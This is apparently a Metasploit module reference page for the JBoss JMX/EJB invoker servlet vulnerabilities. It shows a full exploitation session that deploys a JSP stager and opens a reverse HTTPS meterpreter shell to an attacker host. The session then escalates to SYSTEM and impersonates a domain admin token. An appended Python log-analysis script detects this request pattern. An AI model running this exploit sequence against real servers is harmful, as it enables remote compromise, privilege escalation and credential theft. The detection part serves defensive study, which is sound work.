CVE

Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities

  • CVE-2007-1036
  • CVE-2012-0874
  • CVE-2013-4810

Usage

msf5 > use exploit/multi/http/jboss_invoke_deploy

Examples

msf5 > use exploit/multi/http/jboss_invoke_deploy
msf5 exploit(multi/http/jboss_invoke_deploy) > set RHOSTS 10.10.10.10
msf5 exploit(multi/http/jboss_invoke_deploy) > set RPORT 8180
msf5 exploit(multi/http/jboss_invoke_deploy) > set PAYLOAD windows/meterpreter/reverse_https
msf5 exploit(multi/http/jboss_invoke_deploy) > set LHOST 10.10.10.1
msf5 exploit(multi/http/jboss_invoke_deploy) > set LPORT 8443
msf5 exploit(multi/http/jboss_invoke_deploy) > run

[*] Started HTTPS reverse handler on https://10.10.10.1:8443
[*] Using manually select target: "Windows Universal"
[*] Deploying stager
[*] Calling stager: /EnyMtdpsHwfYUU/idIzmUiHUjmzdC.jsp
[*] Uploading payload through stager
[*] Calling payload: /BiAbpcPbeQku/MAhczELmEptIOJe.jsp
[*] Removing payload through stager
[*] Removing stager
[*] https://10.10.10.1:8443 handling request from 10.10.10.10; (UUID: 4goaaaae) Staging x86 payload (177241 bytes) ...
[*] Meterpreter session 1 opened (10.10.10.1:8443 -> 10.10.10.10:50537) at 1970-01-01 00:01:00 +0200

meterpreter > getsystem
...got system (via technique 1).
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
offsec.nl\adm-JohnDo

meterpreter > impersonate_token offsec.nl\adm-JohnDo
[+] Delegation token available
[+] Successfully impersonated user offsec.nl\adm-JohnDo
meterpreter > getuid
Server username: offsec.nl\adm-JohnDo
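
Detection example for the request sequence in the session output above (invoker servlet call, then JSPs served from contexts that were not deployed before). This is an added example, not part of the original page or of Metasploit; the /invoker/ mount path, the access-log format, the sample lines and the known_contexts allowlist are assumptions.

```python
import re

# Constructed sample lines in common access-log format (not from a real host).
SAMPLE_LOG = """\
10.10.10.1 - - [01/Jan/1970:00:00:58 +0200] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 3401
10.10.10.1 - - [01/Jan/1970:00:00:59 +0200] "GET /EnyMtdpsHwfYUU/idIzmUiHUjmzdC.jsp HTTP/1.1" 200 12
10.10.10.1 - - [01/Jan/1970:00:01:00 +0200] "GET /BiAbpcPbeQku/MAhczELmEptIOJe.jsp HTTP/1.1" 200 0
10.10.10.7 - - [01/Jan/1970:00:01:02 +0200] "GET /shop/index.jsp HTTP/1.1" 200 5120
10.10.10.9 - - [01/Jan/1970:00:01:03 +0200] "GET /invoker/EJBInvokerServlet HTTP/1.1" 401 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumed default mount point of the JBoss HTTP invoker servlets.
INVOKER_RE = re.compile(r'^/invoker/(?:JMX|EJB)InvokerServlet', re.I)
# First path segment is the web-app context the JSP is served from.
JSP_RE = re.compile(r'^/([^/]+)/[^/?]+\.jsp', re.I)


def analyze(log_text, known_contexts):
    """Return (source, finding, path) tuples in log order."""
    findings = []
    invoked = set()  # sources that got a 2xx answer from an invoker servlet
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, path, status = m.group(1), m.group(3), int(m.group(4))
        ok = 200 <= status < 300
        if INVOKER_RE.match(path):
            if ok:
                invoked.add(src)
            findings.append((src, "invoker-reachable" if ok else "invoker-probe", path))
            continue
        jsp = JSP_RE.match(path)
        # A JSP answering from a context nobody deployed is the strongest signal.
        if jsp and ok and jsp.group(1) not in known_contexts:
            kind = "new-context-jsp-after-invoker" if src in invoked else "unknown-context-jsp"
            findings.append((src, kind, path))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG, known_contexts={"shop"}):
        print(*finding)
```

Any "invoker-reachable" finding from an untrusted source means the invoker servlets are exposed without authentication and should be removed or restricted.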

URL List